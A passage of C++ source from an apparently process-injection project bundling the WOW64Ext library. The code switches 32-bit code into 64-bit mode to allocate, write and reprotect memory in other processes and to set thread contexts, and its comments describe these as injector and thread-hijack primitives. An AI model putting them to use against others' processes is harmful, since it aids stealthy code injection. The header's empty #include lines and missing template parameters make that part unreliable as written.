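    return funcRet;
}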
430 |
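// 64-bit counterpart of VirtualQueryEx(): queries MemoryBasicInformation
// (information class 0) for `lpAddress` in `hProcess` through the 64-bit
// NtQueryVirtualMemory, so the full 64-bit address space of a target can be
// inspected from 32-bit code. `lpBuffer`/`dwLength` are passed straight to the
// kernel, which validates them.
// Returns the number of bytes written to `lpBuffer`, or 0 on failure with the
// NTSTATUS mapped into GetLastError() — matching the Win32 contract. The
// previous version returned whatever ReturnLength the kernel may have stored
// even when the call failed, which could be mistaken for success.
/*extern "C" __declspec(dllexport) */SIZE_T __cdecl VirtualQueryEx64(HANDLE hProcess, DWORD64 lpAddress, MEMORY_BASIC_INFORMATION64* lpBuffer, SIZE_T dwLength)
{
    static DWORD64 ntqvm = 0;
    if (0 == ntqvm)
    {
        ntqvm = GetProcAddress64(getNTDLL64(), "NtQueryVirtualMemory");
        if (0 == ntqvm)
            return 0;
    }

    DWORD64 returnLength = 0;
    const DWORD64 status = X64Call(ntqvm, 6,
        (DWORD64)hProcess, lpAddress, (DWORD64)0 /* MemoryBasicInformation */,
        (DWORD64)lpBuffer, (DWORD64)dwLength, (DWORD64)&returnLength);
    if (STATUS_SUCCESS != status)
    {
        SetLastErrorFromX64Call(status);
        return 0;
    }
    return (SIZE_T)returnLength;
}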
446 |
// 64-bit counterpart of VirtualAllocEx(): thin wrapper over the 64-bit
// NtAllocateVirtualMemory so that `lpAddress` and the returned base may be
// full 64-bit values. `flAllocationType` and `flProtect` are forwarded
// unchanged (ZeroBits is always 0); this is the allocation primitive an
// injector uses in a 64-bit target, so callers decide the protection.
// Returns the base address reported back by the kernel through the in/out
// argument (which it may adjust), or 0 on failure with the NTSTATUS mapped
// into GetLastError(). The syscall stub is resolved once and cached; the
// unsynchronised static is harmless because every writer stores the same value.
/*extern "C" __declspec(dllexport) */DWORD64 __cdecl VirtualAllocEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
{
    static DWORD64 pfnNtAllocateVirtualMemory = 0;
    if (!pfnNtAllocateVirtualMemory)
        pfnNtAllocateVirtualMemory = GetProcAddress64(getNTDLL64(), "NtAllocateVirtualMemory");
    if (!pfnNtAllocateVirtualMemory)
        return 0;

    // Both are in/out: the kernel writes the final base and size back.
    DWORD64 baseAddress = lpAddress;
    DWORD64 regionSize = dwSize;

    const DWORD64 status = X64Call(pfnNtAllocateVirtualMemory, 6,
        (DWORD64)hProcess, (DWORD64)&baseAddress, (DWORD64)0,
        (DWORD64)&regionSize, (DWORD64)flAllocationType, (DWORD64)flProtect);
    if (STATUS_SUCCESS == status)
        return baseAddress;

    SetLastErrorFromX64Call(status);
    return 0;
}
468 |
// 64-bit counterpart of VirtualFreeEx(): releases or decommits memory in
// `hProcess` through the 64-bit NtFreeVirtualMemory. `lpAddress`/`dwSize` are
// passed by reference as the syscall requires and `dwFreeType` is forwarded
// unchanged. Returns TRUE on success, FALSE on failure with the NTSTATUS
// mapped into GetLastError() (also FALSE if the syscall stub cannot be
// resolved). The stub address is resolved once and cached in a static.
/*extern "C" __declspec(dllexport) */BOOL __cdecl VirtualFreeEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD dwFreeType)
{
    static DWORD64 pfnNtFreeVirtualMemory = 0;
    if (!pfnNtFreeVirtualMemory)
        pfnNtFreeVirtualMemory = GetProcAddress64(getNTDLL64(), "NtFreeVirtualMemory");
    if (!pfnNtFreeVirtualMemory)
        return FALSE;

    DWORD64 baseAddress = lpAddress;
    DWORD64 regionSize = dwSize;

    const DWORD64 status = X64Call(pfnNtFreeVirtualMemory, 4,
        (DWORD64)hProcess, (DWORD64)&baseAddress, (DWORD64)&regionSize, (DWORD64)dwFreeType);
    if (STATUS_SUCCESS == status)
        return TRUE;

    SetLastErrorFromX64Call(status);
    return FALSE;
}
490 |
// 64-bit counterpart of VirtualProtectEx(): changes the protection of the
// region [lpAddress, lpAddress+dwSize) in `hProcess` through the 64-bit
// NtProtectVirtualMemory. `lpflOldProtect` receives the previous protection;
// it is handed to the kernel as a 32-bit pointer and is not checked here, so
// callers must pass a valid pointer. Returns TRUE on success, FALSE on failure
// with the NTSTATUS mapped into GetLastError() (also FALSE if the syscall stub
// cannot be resolved). The stub address is resolved once and cached.
/*extern "C" __declspec(dllexport) */BOOL __cdecl VirtualProtectEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD flNewProtect, DWORD* lpflOldProtect)
{
    static DWORD64 pfnNtProtectVirtualMemory = 0;
    if (!pfnNtProtectVirtualMemory)
        pfnNtProtectVirtualMemory = GetProcAddress64(getNTDLL64(), "NtProtectVirtualMemory");
    if (!pfnNtProtectVirtualMemory)
        return FALSE;

    DWORD64 baseAddress = lpAddress;
    DWORD64 regionSize = dwSize;

    const DWORD64 status = X64Call(pfnNtProtectVirtualMemory, 5,
        (DWORD64)hProcess, (DWORD64)&baseAddress, (DWORD64)&regionSize,
        (DWORD64)flNewProtect, (DWORD64)lpflOldProtect);
    if (STATUS_SUCCESS == status)
        return TRUE;

    SetLastErrorFromX64Call(status);
    return FALSE;
}
512 |
// 64-bit counterpart of ReadProcessMemory(): reads `nSize` bytes from the
// 64-bit address `lpBaseAddress` in `hProcess` into the 32-bit buffer
// `lpBuffer` through the 64-bit NtReadVirtualMemory. On success the byte
// count reported by the kernel is stored in *lpNumberOfBytesRead (if given)
// and TRUE is returned. Any non-success status — including a partial copy —
// yields FALSE with the NTSTATUS mapped into GetLastError(), and
// *lpNumberOfBytesRead is left unchanged. The syscall stub is resolved once
// and cached in a static.
/*extern "C" __declspec(dllexport) */BOOL __cdecl ReadProcessMemory64(HANDLE hProcess, DWORD64 lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead)
{
    static DWORD64 pfnNtReadVirtualMemory = 0;
    if (!pfnNtReadVirtualMemory)
        pfnNtReadVirtualMemory = GetProcAddress64(getNTDLL64(), "NtReadVirtualMemory");
    if (!pfnNtReadVirtualMemory)
        return FALSE;

    // The kernel writes a 64-bit count; seeded from the caller's variable when
    // one is supplied, then copied back on success.
    DWORD64 bytesTransferred = 0;
    if (lpNumberOfBytesRead)
        bytesTransferred = *lpNumberOfBytesRead;

    const DWORD64 status = X64Call(pfnNtReadVirtualMemory, 5,
        (DWORD64)hProcess, lpBaseAddress, (DWORD64)lpBuffer, (DWORD64)nSize, (DWORD64)&bytesTransferred);
    if (STATUS_SUCCESS != status)
    {
        SetLastErrorFromX64Call(status);
        return FALSE;
    }

    if (lpNumberOfBytesRead)
        *lpNumberOfBytesRead = (SIZE_T)bytesTransferred;
    return TRUE;
}
536 |
// 64-bit counterpart of WriteProcessMemory(): writes `nSize` bytes from the
// 32-bit buffer `lpBuffer` to the 64-bit address `lpBaseAddress` in
// `hProcess` through the 64-bit NtWriteVirtualMemory. This is the
// cross-architecture write primitive of the library; it does not change page
// protection, so the destination must already be writable. On success the
// kernel's byte count is stored in *lpNumberOfBytesWritten (if given) and
// TRUE is returned; any non-success status yields FALSE with the NTSTATUS
// mapped into GetLastError() and the out-parameter left unchanged. The
// syscall stub is resolved once and cached in a static.
/*extern "C" __declspec(dllexport) */BOOL __cdecl WriteProcessMemory64(HANDLE hProcess, DWORD64 lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
{
    static DWORD64 pfnNtWriteVirtualMemory = 0;
    if (!pfnNtWriteVirtualMemory)
        pfnNtWriteVirtualMemory = GetProcAddress64(getNTDLL64(), "NtWriteVirtualMemory");
    if (!pfnNtWriteVirtualMemory)
        return FALSE;

    // 64-bit out-parameter for the kernel, seeded from the caller's variable
    // when one is supplied and copied back on success.
    DWORD64 bytesTransferred = 0;
    if (lpNumberOfBytesWritten)
        bytesTransferred = *lpNumberOfBytesWritten;

    const DWORD64 status = X64Call(pfnNtWriteVirtualMemory, 5,
        (DWORD64)hProcess, lpBaseAddress, (DWORD64)lpBuffer, (DWORD64)nSize, (DWORD64)&bytesTransferred);
    if (STATUS_SUCCESS != status)
    {
        SetLastErrorFromX64Call(status);
        return FALSE;
    }

    if (lpNumberOfBytesWritten)
        *lpNumberOfBytesWritten = (SIZE_T)bytesTransferred;
    return TRUE;
}
560 |
// 64-bit counterpart of GetThreadContext(): fills the caller's _CONTEXT64 for
// `hThread` through the 64-bit NtGetContextThread. The caller sets
// lpContext->ContextFlags (CONTEXT64_*) beforehand to select what is
// retrieved. NOTE(review): the x64 kernel is known to reject misaligned
// CONTEXT records — confirm callers allocate lpContext 16-byte aligned, since
// _CONTEXT64 is declared under #pragma pack(1).
// Returns TRUE on success, FALSE on failure with the NTSTATUS mapped into
// GetLastError() (also FALSE if the syscall stub cannot be resolved).
/*extern "C" __declspec(dllexport) */BOOL __cdecl GetThreadContext64(HANDLE hThread, _CONTEXT64* lpContext)
{
    static DWORD64 pfnNtGetContextThread = 0;
    if (!pfnNtGetContextThread)
        pfnNtGetContextThread = GetProcAddress64(getNTDLL64(), "NtGetContextThread");
    if (!pfnNtGetContextThread)
        return FALSE;

    const DWORD64 status = X64Call(pfnNtGetContextThread, 2, (DWORD64)hThread, (DWORD64)lpContext);
    if (STATUS_SUCCESS == status)
        return TRUE;

    SetLastErrorFromX64Call(status);
    return FALSE;
}
579 |
// 64-bit counterpart of SetThreadContext(): applies the caller's _CONTEXT64
// to `hThread` through the 64-bit NtSetContextThread; only the parts selected
// by lpContext->ContextFlags (CONTEXT64_*) are written. This is the primitive
// used to hijack a 64-bit thread (e.g. redirect Rip), so the target thread
// should be suspended by the caller first. NOTE(review): as with
// GetThreadContext64, confirm lpContext is 16-byte aligned.
// Returns TRUE on success, FALSE on failure with the NTSTATUS mapped into
// GetLastError() (also FALSE if the syscall stub cannot be resolved).
/*extern "C" __declspec(dllexport) */BOOL __cdecl SetThreadContext64(HANDLE hThread, _CONTEXT64* lpContext)
{
    static DWORD64 pfnNtSetContextThread = 0;
    if (!pfnNtSetContextThread)
        pfnNtSetContextThread = GetProcAddress64(getNTDLL64(), "NtSetContextThread");
    if (!pfnNtSetContextThread)
        return FALSE;

    const DWORD64 status = X64Call(pfnNtSetContextThread, 2, (DWORD64)hThread, (DWORD64)lpContext);
    if (STATUS_SUCCESS == status)
        return TRUE;

    SetLastErrorFromX64Call(status);
    return FALSE;
}
598 | #endif
599 |
600 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/wow64ext/wow64ext.h:
--------------------------------------------------------------------------------
1 | /**
2 | *
3 | * WOW64Ext Library
4 | *
5 | * Copyright (c) 2014 ReWolf
6 | * http://blog.rewolf.pl/
7 | *
8 | * This program is free software: you can redistribute it and/or modify
9 | * it under the terms of the GNU Lesser General Public License as published
10 | * by the Free Software Foundation, either version 3 of the License, or
11 | * (at your option) any later version.
12 | *
13 | * This program is distributed in the hope that it will be useful,
14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | * GNU Lesser General Public License for more details.
17 | *
18 | * You should have received a copy of the GNU Lesser General Public License
19 | * along with this program. If not, see <http://www.gnu.org/licenses/>.
20 | *
21 | */
22 | #pragma once
23 |
24 | #include
25 |
26 | #ifndef _WIN64
// NTSTATUS success value (0), defined locally so users of this header do not
// have to pull in the NT status header; every *64 wrapper compares the X64Call
// result against it.
#ifndef STATUS_SUCCESS
# define STATUS_SUCCESS 0
#endif
30 |
31 | #pragma pack(push)
32 | #pragma pack(1)
// Doubly-linked list node with pointer-sized links, parameterised on the
// pointer type so the same definition describes the 32-bit and 64-bit layouts.
// NOTE(review): the template parameter list (presumably `<class T>`) is
// missing from this copy of the header and must be restored before building.
template
struct _LIST_ENTRY_T
{
T Flink;
T Blink;
};
39 |
// Counted string header as used by the NT loader: Length and MaximumLength
// are byte counts, Buffer is a pointer of type T. The union pads the two
// WORDs to pointer size so Buffer lands at the same offset as in the native
// structure. With T = DWORD64 the layout also matches ANSI_STRING64, which
// GetProcAddress64 relies on.
// NOTE(review): the template parameter list (presumably `<class T>`) is
// missing from this copy of the header and must be restored before building.
template
struct _UNICODE_STRING_T
{
union
{
struct
{
WORD Length;
WORD MaximumLength;
};
T dummy;
};
T Buffer;
};
54 |
// Thread Information Block prefix of the TEB, all fields pointer-sized (T).
// NOTE(review): the template parameter list (presumably `<class T>`) is
// missing from this copy of the header and must be restored before building.
template
struct _NT_TIB_T
{
T ExceptionList;
T StackBase;
T StackLimit;
T SubSystemTib;
T FiberData;
T ArbitraryUserPointer;
T Self;
};
66 |
// Process/thread id pair as stored in the TEB (HANDLE-sized values of type T).
// NOTE(review): the template parameter list (presumably `<class T>`) is
// missing from this copy of the header and must be restored before building.
template
struct _CLIENT_ID
{
T UniqueProcess;
T UniqueThread;
};
73 |
// Leading part of the Thread Environment Block. Only the fields up to
// User32Reserved are declared; the library needs just
// ProcessEnvironmentBlock (read by GetModuleHandle64 to reach the PEB64).
// NOTE(review): the template parameter list (presumably `<class T>`) and the
// `<T>` arguments on the _NT_TIB_T/_CLIENT_ID members are missing from this
// copy of the header and must be restored before building.
template
struct _TEB_T_
{
_NT_TIB_T NtTib;
T EnvironmentPointer;
_CLIENT_ID ClientId;
T ActiveRpcHandle;
T ThreadLocalStoragePointer;
T ProcessEnvironmentBlock;
DWORD LastErrorValue;
DWORD CountOfOwnedCriticalSections;
T CsrClientThread;
T Win32ThreadInfo;
DWORD User32Reserved[26];
//rest of the structure is not defined for now, as it is not needed
};
90 |
// One loaded module as recorded by the NT loader. GetModuleHandle64 walks
// InLoadOrderLinks, compares BaseDllName and returns DllBase; the remaining
// fields are declared only so the structure has the right size and offsets.
// The `dummy*` union members pad DWORD fields to pointer size (T).
// NOTE(review): the template parameter list (presumably `<class T>`) and the
// `<T>` arguments on the _LIST_ENTRY_T/_UNICODE_STRING_T members are missing
// from this copy of the header and must be restored before building.
template
struct _LDR_DATA_TABLE_ENTRY_T
{
_LIST_ENTRY_T InLoadOrderLinks;
_LIST_ENTRY_T InMemoryOrderLinks;
_LIST_ENTRY_T InInitializationOrderLinks;
T DllBase;
T EntryPoint;
union
{
DWORD SizeOfImage;
T dummy01;
};
_UNICODE_STRING_T FullDllName;
_UNICODE_STRING_T BaseDllName;
DWORD Flags;
WORD LoadCount;
WORD TlsIndex;
union
{
_LIST_ENTRY_T HashLinks;
struct
{
T SectionPointer;
T CheckSum;
};
};
union
{
T LoadedImports;
DWORD TimeDateStamp;
};
T EntryPointActivationContext;
T PatchInformation;
_LIST_ENTRY_T ForwarderLinks;
_LIST_ENTRY_T ServiceTagLinks;
_LIST_ENTRY_T StaticLinks;
T ContextInformation;
T OriginalBase;
_LARGE_INTEGER LoadTime;
};
132 |
// Loader data block pointed to by PEB.Ldr. InLoadOrderModuleList is the
// circular list head that GetModuleHandle64 starts from and stops at
// (its address is computed with offsetof on this type).
// NOTE(review): the template parameter list (presumably `<class T>`) and the
// `<T>` arguments on the _LIST_ENTRY_T members are missing from this copy of
// the header and must be restored before building.
template
struct _PEB_LDR_DATA_T
{
DWORD Length;
DWORD Initialized;
T SsHandle;
_LIST_ENTRY_T InLoadOrderModuleList;
_LIST_ENTRY_T InMemoryOrderModuleList;
_LIST_ENTRY_T InInitializationOrderModuleList;
T EntryInProgress;
DWORD ShutdownInProgress;
T ShutdownThreadId;

};
147 |
// Process Environment Block. The library only reads Ldr (to reach the module
// list) and ImageBaseAddress; everything else is present for layout.
// Parameters: T is the pointer-sized type; NGF is presumably the padding type
// placed next to NtGlobalFlag so the 32- and 64-bit layouts line up; A is the
// GdiHandleBuffer element count, which differs between the two layouts.
// NOTE(review): the template parameter list (presumably
// `<class T, class NGF, int A>`) and the `<T>` arguments on the member
// templates are missing from this copy of the header and must be restored
// before building.
template
struct _PEB_T
{
union
{
struct
{
BYTE InheritedAddressSpace;
BYTE ReadImageFileExecOptions;
BYTE BeingDebugged;
BYTE BitField;
};
T dummy01;
};
T Mutant;
T ImageBaseAddress;
T Ldr;
T ProcessParameters;
T SubSystemData;
T ProcessHeap;
T FastPebLock;
T AtlThunkSListPtr;
T IFEOKey;
T CrossProcessFlags;
T UserSharedInfoPtr;
DWORD SystemReserved;
DWORD AtlThunkSListPtr32;
T ApiSetMap;
T TlsExpansionCounter;
T TlsBitmap;
DWORD TlsBitmapBits[2];
T ReadOnlySharedMemoryBase;
T HotpatchInformation;
T ReadOnlyStaticServerData;
T AnsiCodePageData;
T OemCodePageData;
T UnicodeCaseTableData;
DWORD NumberOfProcessors;
union
{
DWORD NtGlobalFlag;
NGF dummy02;
};
LARGE_INTEGER CriticalSectionTimeout;
T HeapSegmentReserve;
T HeapSegmentCommit;
T HeapDeCommitTotalFreeThreshold;
T HeapDeCommitFreeBlockThreshold;
DWORD NumberOfHeaps;
DWORD MaximumNumberOfHeaps;
T ProcessHeaps;
T GdiSharedHandleTable;
T ProcessStarterHelper;
T GdiDCAttributeList;
T LoaderLock;
DWORD OSMajorVersion;
DWORD OSMinorVersion;
WORD OSBuildNumber;
WORD OSCSDVersion;
DWORD OSPlatformId;
DWORD ImageSubsystem;
DWORD ImageSubsystemMajorVersion;
T ImageSubsystemMinorVersion;
T ActiveProcessAffinityMask;
T GdiHandleBuffer[A];
T PostProcessInitRoutine;
T TlsExpansionBitmap;
DWORD TlsExpansionBitmapBits[32];
T SessionId;
ULARGE_INTEGER AppCompatFlags;
ULARGE_INTEGER AppCompatFlagsUser;
T pShimData;
T AppCompatInfo;
_UNICODE_STRING_T CSDVersion;
T ActivationContextData;
T ProcessAssemblyStorageMap;
T SystemDefaultActivationContextData;
T SystemAssemblyStorageMap;
T MinimumStackCommit;
T FlsCallback;
_LIST_ENTRY_T FlsListHead;
T FlsBitmap;
DWORD FlsBitmapBits[4];
T FlsHighIndex;
T WerRegistrationData;
T WerShipAssertPtr;
T pContextData;
T pImageHeaderHash;
T TracingFlags;
};
238 |
// Concrete instantiations: the *32 names describe the WoW64 (32-bit) layouts,
// the *64 names the native layouts that wow64ext.cpp reads via getMem64().
// NOTE(review): the template arguments (the pointer-sized type for each
// layout, plus NGF/A for the PEB) are missing from this copy of the header
// and must be restored from upstream before building.
typedef _LDR_DATA_TABLE_ENTRY_T LDR_DATA_TABLE_ENTRY32;
typedef _LDR_DATA_TABLE_ENTRY_T LDR_DATA_TABLE_ENTRY64;

typedef _TEB_T_ TEB32;
typedef _TEB_T_ TEB64;

typedef _PEB_LDR_DATA_T PEB_LDR_DATA32;
typedef _PEB_LDR_DATA_T PEB_LDR_DATA64;

typedef _PEB_T PEB32;
typedef _PEB_T PEB64;
250 |
// 128-bit SSE register image, 16-byte aligned, used by _XSAVE_FORMAT64 and
// _CONTEXT64. NOTE(review): winnt.h also defines M128A/PM128A; if both are
// visible in one translation unit this is a redefinition — confirm the build
// configuration that this header targets.
typedef struct DECLSPEC_ALIGN(16) _M128A {
ULONGLONG Low;
LONGLONG High;
} M128A, *PM128A;
255 |
256 | #define nullptr NULL
257 |
258 |
// Legacy x87/SSE save area (FXSAVE layout) embedded in _CONTEXT64.FltSave.
// Declared here, rather than taken from winnt.h, because the 32-bit build
// only sees the x86 CONTEXT definitions.
struct _XSAVE_FORMAT64
{
WORD ControlWord;
WORD StatusWord;
BYTE TagWord;
BYTE Reserved1;
WORD ErrorOpcode;
DWORD ErrorOffset;
WORD ErrorSelector;
WORD Reserved2;
DWORD DataOffset;
WORD DataSelector;
WORD Reserved3;
DWORD MxCsr;
DWORD MxCsr_Mask;
_M128A FloatRegisters[8];
_M128A XmmRegisters[16];
BYTE Reserved4[96];
};
278 |
// x64 thread context as consumed by GetThreadContext64/SetThreadContext64.
// Callers set ContextFlags (CONTEXT64_*) to choose which groups are
// transferred. NOTE(review): this is declared inside #pragma pack(1) although
// the native CONTEXT is 16-byte aligned and the kernel is known to reject
// misaligned records; the _M128A members carry DECLSPEC_ALIGN(16) but the
// enclosing struct does not — confirm that callers allocate instances with
// 16-byte alignment.
struct _CONTEXT64
{
DWORD64 P1Home;
DWORD64 P2Home;
DWORD64 P3Home;
DWORD64 P4Home;
DWORD64 P5Home;
DWORD64 P6Home;
DWORD ContextFlags;
DWORD MxCsr;
WORD SegCs;
WORD SegDs;
WORD SegEs;
WORD SegFs;
WORD SegGs;
WORD SegSs;
DWORD EFlags;
DWORD64 Dr0;
DWORD64 Dr1;
DWORD64 Dr2;
DWORD64 Dr3;
DWORD64 Dr6;
DWORD64 Dr7;
DWORD64 Rax;
DWORD64 Rcx;
DWORD64 Rdx;
DWORD64 Rbx;
DWORD64 Rsp;
DWORD64 Rbp;
DWORD64 Rsi;
DWORD64 Rdi;
DWORD64 R8;
DWORD64 R9;
DWORD64 R10;
DWORD64 R11;
DWORD64 R12;
DWORD64 R13;
DWORD64 R14;
DWORD64 R15;
DWORD64 Rip;
_XSAVE_FORMAT64 FltSave;
_M128A Header[2];
_M128A Legacy[8];
_M128A Xmm0;
_M128A Xmm1;
_M128A Xmm2;
_M128A Xmm3;
_M128A Xmm4;
_M128A Xmm5;
_M128A Xmm6;
_M128A Xmm7;
_M128A Xmm8;
_M128A Xmm9;
_M128A Xmm10;
_M128A Xmm11;
_M128A Xmm12;
_M128A Xmm13;
_M128A Xmm14;
_M128A Xmm15;
_M128A VectorRegister[26];
DWORD64 VectorControl;
DWORD64 DebugControl;
DWORD64 LastBranchToRip;
DWORD64 LastBranchFromRip;
DWORD64 LastExceptionToRip;
DWORD64 LastExceptionFromRip;
};
346 |
// Below defines for .ContextFlags field are taken from WinNT.h
// They are the x64 values (CONTEXT_AMD64-based), which a 32-bit build does
// not otherwise see; use them, not the x86 CONTEXT_* macros, when filling
// _CONTEXT64.ContextFlags for GetThreadContext64/SetThreadContext64.
#ifndef CONTEXT_AMD64
#define CONTEXT_AMD64 0x100000
#endif

#define CONTEXT64_CONTROL (CONTEXT_AMD64 | 0x1L)
#define CONTEXT64_INTEGER (CONTEXT_AMD64 | 0x2L)
#define CONTEXT64_SEGMENTS (CONTEXT_AMD64 | 0x4L)
#define CONTEXT64_FLOATING_POINT (CONTEXT_AMD64 | 0x8L)
#define CONTEXT64_DEBUG_REGISTERS (CONTEXT_AMD64 | 0x10L)
#define CONTEXT64_FULL (CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_FLOATING_POINT)
#define CONTEXT64_ALL (CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_SEGMENTS | CONTEXT64_FLOATING_POINT | CONTEXT64_DEBUG_REGISTERS)
#define CONTEXT64_XSTATE (CONTEXT_AMD64 | 0x20L)
360 |
361 | #pragma pack(pop)
362 |
// Public API, compiled only for 32-bit (WoW64) builds. X64Call is the raw
// mode-switch primitive; the remaining functions mirror the Win32 API they
// are named after but operate on the 64-bit address space through the 64-bit
// ntdll: they resolve the Nt* stub once, cache it, and report failure the
// Win32 way (FALSE / 0) after mapping the NTSTATUS into GetLastError() via
// SetLastErrorFromX64Call. Exporting was disabled by commenting out the
// extern "C"/dllexport decorations, so the names are C++-mangled.
//extern "C"
//{
/*__declspec(dllexport)*/DWORD64 __cdecl X64Call(DWORD64 func, int argC, ...);
/*__declspec(dllexport)*/DWORD64 __cdecl GetModuleHandle64(wchar_t* lpModuleName);
/*__declspec(dllexport)*/DWORD64 __cdecl GetProcAddress64(DWORD64 hModule, char* funcName);
/*__declspec(dllexport)*/SIZE_T __cdecl VirtualQueryEx64(HANDLE hProcess, DWORD64 lpAddress, MEMORY_BASIC_INFORMATION64* lpBuffer, SIZE_T dwLength);
/*__declspec(dllexport)*/DWORD64 __cdecl VirtualAllocEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
/*__declspec(dllexport)*/BOOL __cdecl VirtualFreeEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD dwFreeType);
/*__declspec(dllexport)*/BOOL __cdecl VirtualProtectEx64(HANDLE hProcess, DWORD64 lpAddress, SIZE_T dwSize, DWORD flNewProtect, DWORD* lpflOldProtect);
/*__declspec(dllexport)*/BOOL __cdecl ReadProcessMemory64(HANDLE hProcess, DWORD64 lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
/*__declspec(dllexport)*/BOOL __cdecl WriteProcessMemory64(HANDLE hProcess, DWORD64 lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);
/*__declspec(dllexport)*/BOOL __cdecl GetThreadContext64(HANDLE hThread, _CONTEXT64* lpContext);
/*__declspec(dllexport)*/BOOL __cdecl SetThreadContext64(HANDLE hThread, _CONTEXT64* lpContext);
/*__declspec(dllexport)*/VOID __cdecl SetLastErrorFromX64Call(DWORD64 status);
//}
378 | #endif
379 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/wow64ext/wow64ext_old.cpp:
--------------------------------------------------------------------------------
1 | /**
2 | *
3 | * WOW64Ext Library
4 | *
5 | * Copyright (c) 2014 ReWolf
6 | * http://blog.rewolf.pl/
7 | *
8 | * This program is free software: you can redistribute it and/or modify
9 | * it under the terms of the GNU Lesser General Public License as published
10 | * by the Free Software Foundation, either version 3 of the License, or
11 | * (at your option) any later version.
12 | *
13 | * This program is distributed in the hope that it will be useful,
14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | * GNU Lesser General Public License for more details.
17 | *
18 | * You should have received a copy of the GNU Lesser General Public License
19 | * along with this program. If not, see <http://www.gnu.org/licenses/>.
20 | *
21 | */
22 |
23 | #include
24 |
25 | #ifndef _WIN64
26 | #include
27 | #include
28 | #include "internal.h"
29 | #include "wow64ext.h"
30 |
31 | #pragma comment(lib, "Shlwapi.lib")
32 |
// Case-insensitive comparison of two NUL-terminated wide strings.
// Only the ASCII letters 'A'..'Z' are folded to lower case (no locale or
// Unicode handling), which is all the DLL base names compared in this file
// need. Returns 0 when the strings are equal, otherwise the difference of
// the first mismatching (folded) characters, in the spirit of wcscmp.
int _mywcsicmp(const wchar_t *string1, const wchar_t *string2)
{
	size_t pos = 0;
	for (;;)
	{
		wchar_t a = string1[pos];
		wchar_t b = string2[pos];
		if (a >= 'A' && a <= 'Z')
			a += 0x20;
		if (b >= 'A' && b <= 'Z')
			b += 0x20;
		++pos;
		// stop at the terminator of string1 or at the first mismatch
		if (a == 0 || a != b)
			return a - b;
	}
}
52 |
53 | #pragma warning(push)
54 | #pragma warning(disable : 4409)
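// Calls a 64-bit routine from 32-bit (WoW64) code.
//   func - 64-bit address of the routine to call
//   argC - number of variadic DWORD64 arguments that follow; must be >= 0
//          (a negative value is converted to a huge unsigned count by the
//          stack-argument loop below and will corrupt the stack)
//   ...  - the arguments, each already cast to DWORD64 by the caller
// Returns the callee's RAX. The first four arguments are placed in
// RCX/RDX/R8/R9, any further ones are pushed right-to-left, 0x20 bytes of
// register spill space are reserved, and the call is made after switching
// to x64 mode. ESP is aligned to 16 bytes beforehand (with an 8-byte
// correction depending on the parity of the stack-argument count); SS and
// ESP are restored from the saved 32-bit values afterwards.
// Fix: the va_list opened by va_start is now closed with va_end.
/*extern "C" __declspec(dllexport) */DWORD64 __cdecl X64Call(DWORD64 func, int argC, ...)
{
	va_list args;
	va_start(args, argC);
	// The first four arguments travel in registers; argC is decremented for
	// each one consumed so that it ends up as the number of stack arguments.
	reg64 _rcx = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
	reg64 _rdx = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
	reg64 _r8 = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
	reg64 _r9 = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
	reg64 _rax = { 0 };

	// 32-bit address of the first remaining argument inside the va_list area
	// (relies on MSVC's va_arg expanding to an lvalue).
	reg64 restArgs = { (DWORD64)&va_arg(args, DWORD64) };

	// conversion to QWORD for easier use in inline assembly
	reg64 _argC = { (DWORD64)argC };
	DWORD back_esp = 0;

	__asm
	{
		;// keep original esp in back_esp variable
		mov back_esp, esp

		;// align esp to 0x10, without aligned stack some syscalls may return errors !
		;// (actually, for syscalls it is sufficient to align to 8, but SSE opcodes
		;// requires 0x10 alignment), it will be further adjusted according to the
		;// number of arguments above 4
		and esp, 0xFFFFFFF0

		X64_Start();

		;// below code is compiled as x86 inline asm, but it is executed as x64 code
		;// that's why it need sometimes REX_W() macro, right column contains detailed
		;// transcription how it will be interpreted by CPU

		;// fill first four arguments
		REX_W mov ecx, _rcx.dw[0]                       ;// mov rcx, qword ptr [_rcx]
		REX_W mov edx, _rdx.dw[0]                       ;// mov rdx, qword ptr [_rdx]
		push _r8.v                                      ;// push qword ptr [_r8]
		X64_Pop(_R8);                                   ;// pop r8
		push _r9.v                                      ;// push qword ptr [_r9]
		X64_Pop(_R9);                                   ;// pop r9
		;//
		REX_W mov eax, _argC.dw[0]                      ;// mov rax, qword ptr [_argC]
		;//
		;// final stack adjustment, according to the   ;//
		;// number of arguments above 4                 ;//
		test al, 1                                      ;// test al, 1
		jnz _no_adjust                                  ;// jnz _no_adjust
		sub esp, 8                                      ;// sub rsp, 8
	_no_adjust:                                         ;//
		;//
		push edi                                        ;// push rdi
		REX_W mov edi, restArgs.dw[0]                   ;// mov rdi, qword ptr [restArgs]
		;//
		;// put rest of arguments on the stack          ;//
		REX_W test eax, eax                             ;// test rax, rax
		jz _ls_e                                        ;// je _ls_e
		REX_W lea edi, dword ptr [edi + 8*eax - 8]      ;// lea rdi, [rdi + rax*8 - 8]
		;//
	_ls:                                                ;//
		REX_W test eax, eax                             ;// test rax, rax
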